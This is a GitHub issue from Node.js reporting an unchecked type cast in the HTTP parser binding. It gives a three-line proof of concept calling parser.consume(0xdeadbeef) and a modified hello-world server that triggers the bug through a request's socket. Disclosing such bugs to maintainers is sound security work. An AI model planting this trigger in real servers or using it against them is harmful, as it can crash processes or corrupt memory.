Skip to content

Type confusion bug in HTTP parser #12178

Closed
Closed
Type confusion bug in HTTP parser#12178
Labels
c++Issues and PRs that require attention from people who are familiar with C++.http_parserIssues and PRs related to the HTTP Parser dependency or the http_parser binding.
@deian

Description

@deian
deian
opened on Apr 3, 2017

We found unchecked type cast in the HTTP parser code. This one is in https://github.com/nodejs/node/blob/master/src/node_http_parser.cc#L496

Here is the 3 line exploit:

const HTTPParser = process.binding('http_parser').HTTPParser;
var parser = new HTTPParser(HTTPParser.REQUEST);
parser.consume(0xdeadbeef);

Can also just modifying the example on the nodejs.org site to trigger bug with public API:

const http = require('http');

const hostname = '127.0.0.1';
const port = 3000;

const server = http.createServer((req, res) => {
 res.statusCode = 200;
 req.socket.parser.consume(0xdeadbeef);
 res.setHeader('Content-Type', 'text/plain');
 res.end('Hello World\n');
});

server.listen(port, hostname, () => {
 console.log(`Server running at http://${hostname}:${port}/`);
});

Metadata

Metadata

Assignees

No one assigned

    Labels

    c++Issues and PRs that require attention from people who are familiar with C++.http_parserIssues and PRs related to the HTTP Parser dependency or the http_parser binding.

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions